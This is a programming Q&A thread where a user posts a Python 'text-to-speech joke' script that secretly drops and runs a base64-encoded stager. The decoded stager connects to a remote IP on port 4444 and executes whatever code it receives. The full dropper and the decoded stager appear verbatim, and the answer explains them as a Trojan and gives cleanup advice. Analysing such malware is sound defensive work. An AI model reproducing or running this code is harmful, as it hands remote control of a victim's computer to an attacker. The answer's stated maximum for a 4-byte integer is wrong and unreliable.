# What does this python program do? Was it a RAT?

Tags: python

I downloaded a Python program from someone I was talking to online. It seemed pretty useless, and a funny concept. The program would use google TTS to say some funny phrase. When I ran the program, I thought nothing of it, that was until weird things started to happen. My Pycharm closed, without prompting me if I want it to close like it usually does. Then my Brave browser closed too. I got suspicions, so I looked in my task manager, and Python was still running. I terminated the Python that was running, and the odd occurrences seemed to stop. I looked back at the Python file I was sent, and found something extremely odd.

Here was the Python program I was sent:

```
import pip
import os
import string
import subprocess
from subprocess import Popen
import sys

try:
    from pip import main as pipmain
except:
    from pip._internal import main as pipmain

reqs = subprocess.check_output([sys.executable, '-m', 'pip', 'freeze'])
file = open(os.getenv('APPDATA') + "temp.py", "w")
file.write("import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE3OC4xMjguMTg2LjE4MicsNDQ0NCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo=')))")
file.close()
gt = subprocess = Popen(['pythonw', os.getenv('APPDATA') + "temp.py"])
installed_packages = [r.decode().split('==')[0] for r in reqs.split()]
def installpackage(package):
    pipmain(['install', package])

if not 'gTTS' in installed_packages:
    installpackage('gTTS')
if not 'playsound' in installed_packages:
    installpackage('playsound')

import playsound
from gtts import gTTS

tts = gTTS(text='Her the fat hippo',lang='en')
tts.save("temp.mp3")
playsound.playsound('temp.mp3')
os.remove("temp.mp3")
```

But looking at lines 13 to 17, I wondered what that encoded bit was. I can confirm, a file containing the encoded code was siting in my APPDATA folder.

Encoded part of code:

```
file.write("import base64,sys;exec(base64.b64decode({2:str,3:lambda `b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE3OC4xMjguMTg2LjE4MicsNDQ0NCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo=')))")`
```

When I decode it with base64 I get

```
import socket,struct,time
for x in range(10):
    try:
        s=socket.socket(2,socket.SOCK_STREAM)
        s.connect(('178.128.186.182',4444))
        break
    except:
        time.sleep(5)
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(l)
while len(d)<l:
    d+=s.recv(l-len(d))
exec(d,{'s':s})
```

What is this file that was written into my APPDATA supposed to do? All I can understand that it opens that IP 10 times. If it can't connect, wait 5 seconds. The purpose of this program confused me the most.

Answer (score 4, accepted):

It's a [*Trojan*](https://en.wikipedia.org/wiki/Trojan_horse_(computing)), a script with a hidden backdoor. You must assume that your computer is **not yet safe**, as the Trojan has probably installed more software on your computer. If you ran this at a school or an office, you need to go and inform the IT department there about this incident, because this is a security breach within their network, the attackers could have used your computer as a way in.

The loop tries to connect to another computer, *up to* ten times. If the connection attempt it succeeds the `break` stops the loop.

Once it connects, it reads 4 bytes as an unsigned integer number, and reads that many bytes from the socket:

```
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(l)
while len(d)<l:
    d+=s.recv(l-len(d))
```

`l` is now an integer between 0 and 18446744073709551615, and the next three lines are used to read that many bytes from the socket into `d`. `s.recv(l)` will read *up to* `l` bytes but may receive fewer, it depends on how much data has arrived over the network so far. The `while` loop then keeps reading from the socket until all `l` bytes have been received.

It's a standard way of receiving data from a remote connection, read a small fixed number of bytes to encode the length, then keep reading from the socket until you have received all of the expected data.

Then, `exec(d,{'s':s})` will [*execute* that data as Python code](https://docs.python.org/3/library/functions.html#exec), with access to the socket. So we don't know what the program does any more from that point onwards, because the remote socket has been given full control.

Because the code executed at that point can do *anything it likes*, it has probably downloaded other software to further take over your computer. You really, really, **really** want to fully clean it with anti-virus software at this point.

The IP address and port is not accepting connections right now, so I can't go and retrieve the 'payload', the code this script is meant to retrieve and execute, so we can't tell you more specifically what to look for. Such connect-and-download payloads typically change all the time to adjust to circumstances and to increase chances of success.

Comment: I have McCafé antivirus running constantly, but when I get home I will run a full computer scan. Thank you for informing me of what this script did.